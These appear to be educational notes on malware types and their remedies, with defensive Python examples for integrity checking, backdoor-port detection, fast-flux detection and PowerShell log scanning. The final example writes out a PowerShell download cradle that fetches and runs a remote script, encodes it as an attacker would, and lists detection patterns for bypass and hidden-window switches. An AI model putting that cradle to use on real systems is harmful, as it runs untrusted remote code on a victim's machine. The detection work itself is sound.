Malicious Code
In this chapter we will go over the different types of malicious code and the effect each can have on a system.
Types
Ransomware
Takes over a user's computer or data and demands a ransom to give it back
Can take many forms:
Encrypts files (crypto-ransomware) so the user cannot open them without the attacker's key
Screen lockers posing as a police or law-enforcement notice that demands a "fine"
Remedy for this
An effective, tested backup system, kept offline or otherwise out of the malware's reach, so files can be restored without paying
Trojans
Masks itself as a legitimate program to entice the user to download and run it, then unleashes its payload, which is typically a RAT (Remote Access Trojan) giving the attacker remote control of the machine
Remedy for this
Anti-virus / anti-malware software
Be security smart: don't download or run software from untrusted sources
Worms
Worms require no user interaction to spread. They can propagate through email attachments, network shares, and other methods, and they install themselves on each host they reach, which makes them very dangerous
Rootkits
Rootkits are malware designed to gain and keep privileged (root or administrator) access, often through a backdoor, and they include the capability to conceal themselves (their files, processes, and network connections) from detection, which makes them quite dangerous
Remedy for this
Integrity checking and validating system data against expected responses (for example known-good file hashes) can reveal a rootkit, but since a rootkit can lie to tools running on the infected system, the most recommended solution once one is found is to restore from a clean backup or do a fresh install
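The integrity check described above, as an added example that is not part of the original notes: a baseline of SHA-256 hashes is taken from a known-clean tree and later compared with the live tree. The "system" tree, the trojaned ps binary and the evil.ko file are constructed in a temporary directory for the demo; nothing here is a real rootkit or a real system path.

```python
import hashlib
import json
import tempfile
from pathlib import Path

def hash_file(path, chunk_size=65536):
    """SHA-256 of one file, read in chunks so large binaries are not loaded whole."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()

def build_baseline(root):
    """Map every regular file under root (POSIX-style relative path) to its SHA-256."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): hash_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }

def verify(root, baseline):
    """Compare the tree under root with a stored baseline.

    Returns the paths whose hash changed, the paths that appeared since the
    baseline, and the paths that disappeared. A rootkit that hooks the kernel
    can also hide files from this scan, so run it from trusted boot media when
    in doubt.
    """
    current = build_baseline(root)
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "missing": sorted(p for p in baseline if p not in current),
    }

def demo():
    """Constructed scenario: baseline a tiny 'system' tree, then simulate a rootkit
    replacing the 'ps' binary (to hide its processes) and dropping a kernel module."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        (root / "bin" / "ls").write_bytes(b"original ls binary")
        (root / "bin" / "ps").write_bytes(b"original ps binary")

        # The baseline must be stored where the malware cannot rewrite it
        # (offline media, a signed file on another host); serialised here as JSON.
        saved_baseline = json.dumps(build_baseline(root))

        # Simulated compromise.
        (root / "bin" / "ps").write_bytes(b"trojaned ps that omits the rootkit's pids")
        (root / "bin" / "evil.ko").write_bytes(b"loadable kernel module")

        return verify(root, json.loads(saved_baseline))

if __name__ == "__main__":
    print(demo())
```

The baseline is only as trustworthy as the moment it was taken and the place it is kept, which is why the notes end with restoring from backup or reinstalling: once a rootkit is confirmed, the hashing tool itself may be lying.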
Backdoors
Backdoors are methods or tools that bypass the normal authentication procedures, allowing attackers access to the system
Backdoors can be both hardware and software based
Remedy for this
Check which ports and services are listening and compare them with what the system should be running; an unexpected listener, or a web-based backdoor such as a web shell on the web server, shows up this way
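The port check above, as an added example that is not part of the original notes: the output of `ss -H -tlnp` (Linux listening TCP sockets with owning process) is compared with an allowlist of the listeners the host is supposed to have. The sample output, the allowlist and the list of suspicious programs are constructed assumptions for the demo; a real host's allowlist comes from its build documentation.

```python
import re

# Constructed output of `ss -H -tlnp`. Port 4444 held by nc and port 8080 held
# by python3 are the planted backdoors; the other three are expected services.
SAMPLE_SS_OUTPUT = """\
LISTEN 0 128 0.0.0.0:22 0.0.0.0:* users:(("sshd",pid=812,fd=3))
LISTEN 0 511 *:80 *:* users:(("nginx",pid=1201,fd=6))
LISTEN 0 128 127.0.0.1:631 0.0.0.0:* users:(("cupsd",pid=640,fd=7))
LISTEN 0 5 0.0.0.0:4444 0.0.0.0:* users:(("nc",pid=31337,fd=3))
LISTEN 0 128 [::]:8080 [::]:* users:(("python3",pid=4021,fd=3))
"""

# The listeners this host is supposed to have: port -> process name (assumption).
EXPECTED_LISTENERS = {22: "sshd", 80: "nginx", 631: "cupsd"}

# Programs that rarely belong as long-lived network listeners on a server.
# A shell or interpreter bound to a port is the classic bind-shell backdoor.
SUSPICIOUS_PROCESSES = {"nc", "ncat", "netcat", "socat", "python", "python3",
                        "perl", "php", "bash", "sh"}

PROCESS_RE = re.compile(r'\(\("([^"]+)",pid=(\d+)')

def parse_ss_line(line):
    """Return (port, process, pid) for one `ss -H -tlnp` line, or None if unparseable."""
    fields = line.split()
    if len(fields) < 5:
        return None
    local_addr = fields[3]                      # e.g. 0.0.0.0:22 or [::]:8080
    port = int(local_addr.rsplit(":", 1)[1])
    m = PROCESS_RE.search(line)
    process, pid = (m.group(1), int(m.group(2))) if m else ("unknown", 0)
    return port, process, pid

def find_unexpected_listeners(ss_output, expected=EXPECTED_LISTENERS):
    """Flag listeners that are not in the allowlist, or that are owned by a
    different process than expected (a service binary swapped for a backdoor)."""
    findings = []
    for line in ss_output.splitlines():
        parsed = parse_ss_line(line)
        if parsed is None:
            continue
        port, process, pid = parsed
        if port not in expected:
            reason = "port not in allowlist"
        elif expected[port] != process:
            reason = f"port {port} should be {expected[port]}"
        else:
            continue                            # matches the baseline
        if process in SUSPICIOUS_PROCESSES:
            reason += "; interpreter/netcat listener (possible bind shell or web backdoor)"
        findings.append({"port": port, "process": process, "pid": pid, "reason": reason})
    return findings

if __name__ == "__main__":
    for f in find_unexpected_listeners(SAMPLE_SS_OUTPUT):
        print(f"port {f['port']:<5} {f['process']:<8} pid {f['pid']:<6} {f['reason']}")
```

A web shell hides inside an expected listener (the web server's own port 80/443), so this check catches it only indirectly; for that case the web root needs the same kind of file integrity comparison as the rootkit remedy above.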
Bots
Bots are systems infected with malware that lets an attacker control them remotely. A group of these devices is called a botnet; botnets can be used to cause denial of service against websites and much more
Botnet command and control (C2) most commonly operates in client-server mode, where the command and control machine issues commands to the other machines (the bots)
Many botnets use fast-flux DNS, in which many IP addresses answer queries for one or more fully qualified domain names. The rapid changes in the DNS records (and sometimes in the name servers and zone) make the real infrastructure difficult to track down
Remedy for this
The use of IDS and IPS to detect the command and control traffic flow; reverse engineering a captured bot then reveals how it communicates, so that traffic can be identified and blocked
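A simple fast-flux detector, as an added example that is not part of the original notes: it runs over passive-DNS style log lines and flags a name when many distinct addresses, spread across unrelated /24 networks, answer for it with short TTLs. The log lines, the domain names and the thresholds are constructed assumptions for the demo (addresses are from the RFC 5737 documentation ranges).

```python
import ipaddress
from collections import defaultdict
from statistics import mean

# Constructed passive-DNS log, one answer per line: "<time> <fqdn> <rrtype> <answer> <ttl>".
# update.bad-example.net is the fast-flux name; www.example.com is a stable site.
SAMPLE_DNS_LOG = """\
2024-05-01T10:00:00Z update.bad-example.net A 192.0.2.15 60
2024-05-01T10:01:00Z update.bad-example.net A 198.51.100.77 60
2024-05-01T10:02:00Z update.bad-example.net A 203.0.113.201 60
2024-05-01T10:03:00Z update.bad-example.net A 192.0.2.240 60
2024-05-01T10:04:00Z update.bad-example.net A 198.51.100.12 60
2024-05-01T10:05:00Z update.bad-example.net A 203.0.113.33 60
2024-05-01T10:00:00Z www.example.com A 203.0.113.10 3600
2024-05-01T10:30:00Z www.example.com A 203.0.113.11 3600
2024-05-01T11:00:00Z www.example.com A 203.0.113.10 3600
2024-05-01T10:00:00Z mail.example.com MX mx1.example.com 3600
"""

def parse_dns_log(text):
    """Return a list of (fqdn, IPv4 address, ttl) for the A records; other types are skipped."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[2] != "A":
            continue
        _time, fqdn, _rrtype, answer, ttl = parts
        records.append((fqdn, ipaddress.ip_address(answer), int(ttl)))
    return records

def fast_flux_report(records, min_ips=5, min_nets=3, max_ttl=300):
    """Per name: distinct IPs that answered, distinct /24 networks they span, mean TTL.
    A name is flagged only when all three thresholds are met: many addresses,
    spread across unrelated networks, with TTLs short enough to rotate them fast.
    The thresholds are assumptions to tune per environment."""
    by_name = defaultdict(list)
    for fqdn, ip, ttl in records:
        by_name[fqdn].append((ip, ttl))
    report = {}
    for fqdn, entries in by_name.items():
        ips = {ip for ip, _ in entries}
        nets = {ipaddress.ip_network(f"{ip}/24", strict=False) for ip in ips}
        avg_ttl = mean(ttl for _, ttl in entries)
        report[fqdn] = {
            "distinct_ips": len(ips),
            "distinct_24s": len(nets),
            "avg_ttl": avg_ttl,
            "fast_flux": len(ips) >= min_ips and len(nets) >= min_nets and avg_ttl <= max_ttl,
        }
    return report

if __name__ == "__main__":
    for name, r in fast_flux_report(parse_dns_log(SAMPLE_DNS_LOG)).items():
        flag = "FAST-FLUX" if r["fast_flux"] else "ok"
        print(f"{name:<26} ips={r['distinct_ips']} /24s={r['distinct_24s']} ttl={r['avg_ttl']:.0f} {flag}")
```

Large CDNs also answer with many low-TTL addresses, so a hit from this heuristic is a lead to confirm with other signals (how many different networks and owners the addresses belong to, domain age, reputation), not a verdict on its own.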
Key Loggers
Keyloggers are programs that capture keystrokes from keyboards
Keyloggers capture user input by hooking the kernel's keyboard input, application APIs, or page scripts (for browser-based keyloggers)
Remedy for this
The use of MFA (multi-factor authentication), so that a captured password alone is not enough to log in
Logic Bombs
Logic bombs do not require a separate malicious program to work: they are functions or code placed inside other, otherwise legitimate programs that activate when certain conditions are met (for example a particular date is reached).
Viruses
In short, viruses are malware that copy and replicate themselves
They require one or more infection mechanisms to spread
Viruses normally have two stages:
The trigger (the conditions that cause the virus to activate)
The payload (the actions the virus performs once triggered)
Viruses come in many forms:
Memory-resident viruses, which stay in memory for as long as the device is running
Non-memory-resident viruses, which execute, spread, then shut down
Boot sector viruses, which reside in the boot sector of a drive and load before the operating system
Macro viruses, which use macros (code inside word processing and other office documents) to spread
Email viruses, which spread through email
Fileless viruses
Fileless viruses work in the same way normal viruses work, but with a key difference:
They inject themselves into the memory of the device (often through a built-in tool such as PowerShell) and conduct further malicious activity from there, and they set up a way to reinfect the machine after a reboot; at no point do they write a payload to the filesystem, which makes them hard to track
The best defence is not being vulnerable in the first place: keep the operating system, browsers and plugins up to date, use an IPS, and lock down PowerShell (script logging and Constrained Language Mode) so it cannot be used to load code into memory
Spyware
Spyware is malware designed to gather information about an individual; it is usually used to track a user's browsing habits but can also be used to capture sensitive data
The best way to combat this is to use a decent anti-virus / anti-spyware product
PUPs
Potentially Unwanted Programs are programs that are not dangerous malware but cause annoyance and take resources away from the device; they are usually installed, bundled with other software, without the user being aware
Most anti-virus products can remove these
Malicious Code
Malicious code can come in many forms, such as scripts and custom-built code.
It often uses the tools built into the operating system:
Windows: PowerShell and Visual Basic (VBScript / VBA)
Linux: Bash and Python
It can also use Microsoft Office suite macros for malicious intent
To prevent this
Log monitoring, including Windows command-line (process creation) auditing and PowerShell script block logging
The use of Constrained Language Mode for PowerShell, so that scripts cannot reach sensitive commands and arbitrary .NET or COM APIs
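The command-line monitoring listed above, and the PowerShell-based fileless loaders from the viruses section, as one added example that is not part of the original notes: it scans process-creation and script-block style log lines for the markers of a download cradle (an IEX/DownloadString one-liner that runs fetched code straight from memory), decodes any -EncodedCommand blob (base64 of the UTF-16LE script text) and runs the same patterns over the decoded script. The log lines, host names, the cradle and the pattern list are constructed assumptions for the demo.

```python
import base64
import re

# Heuristic patterns for PowerShell abuse: download cradles, in-memory execution,
# and switches that hide the window or skip execution policy and profile loading.
# Each also appears in legitimate administration, so hits are triage leads, not verdicts.
SUSPICIOUS_PATTERNS = {
    "invoke-expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "download-cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I),
    "base64-payload": re.compile(r"frombase64string", re.I),
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy-bypass": re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+bypass", re.I),
    "no-profile": re.compile(r"-nop\b|-noprofile\b", re.I),
}
# -EncodedCommand (abbreviated -enc/-ec/-e) followed by a base64 blob.
ENCODED_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(blob):
    """powershell -EncodedCommand takes base64 of the UTF-16LE script text."""
    try:
        return base64.b64decode(blob).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_command_line(cmd):
    """Decode any -EncodedCommand blob, then run the patterns over both the visible
    command line and the decoded script. Returns sorted hit names and the decoded text."""
    decoded = None
    m = ENCODED_RE.search(cmd)
    if m:
        decoded = decode_encoded_command(m.group(1))
    visible = ENCODED_RE.sub(" ", cmd)         # drop the blob so base64 noise cannot match
    text = visible + "\n" + (decoded or "")
    hits = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(text)]
    if m:
        hits.append("encoded-command")
    return {"hits": sorted(hits), "decoded": decoded}

def scan_log(lines):
    """Each line: '<time> <host> <event_id> <command line>'. Returns the suspicious ones."""
    findings = []
    for line in lines:
        time, host, event_id, cmd = line.split(maxsplit=3)
        result = analyze_command_line(cmd)
        if result["hits"]:
            findings.append({"time": time, "host": host, "event": event_id, **result})
    return findings

# Constructed sample. The cradle is what a fileless loader typically runs: fetch a
# script and execute it in memory. It is encoded here the way an attacker passes it
# to -EncodedCommand. IPs are from the RFC 5737 documentation ranges.
CRADLE_TEXT = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
ENCODED_BLOB = base64.b64encode(CRADLE_TEXT.encode("utf-16le")).decode()

# Constructed log lines modelled on event 4688 (process creation with command line)
# and 4104 (script block logging).
SAMPLE_LOG = [
    "2024-05-01T09:12:03Z WS01 4688 powershell.exe -nop -w hidden -ep bypass -enc " + ENCODED_BLOB,
    "2024-05-01T09:15:44Z WS01 4688 powershell.exe Get-Process | Where-Object CPU -gt 100",
    "2024-05-01T09:20:10Z WS02 4688 cmd.exe /c whoami",
    "2024-05-01T09:22:51Z WS02 4104 IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/x.ps1')",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['host']} event {f['event']}: {', '.join(f['hits'])}")
        if f["decoded"]:
            print("    decoded:", f["decoded"])
```

Command-line auditing alone misses the second stage (the script pulled down by the cradle never appears as a command line), which is why script block logging is paired with it; Constrained Language Mode then stops the decoded cradle from calling New-Object Net.WebClient in the first place.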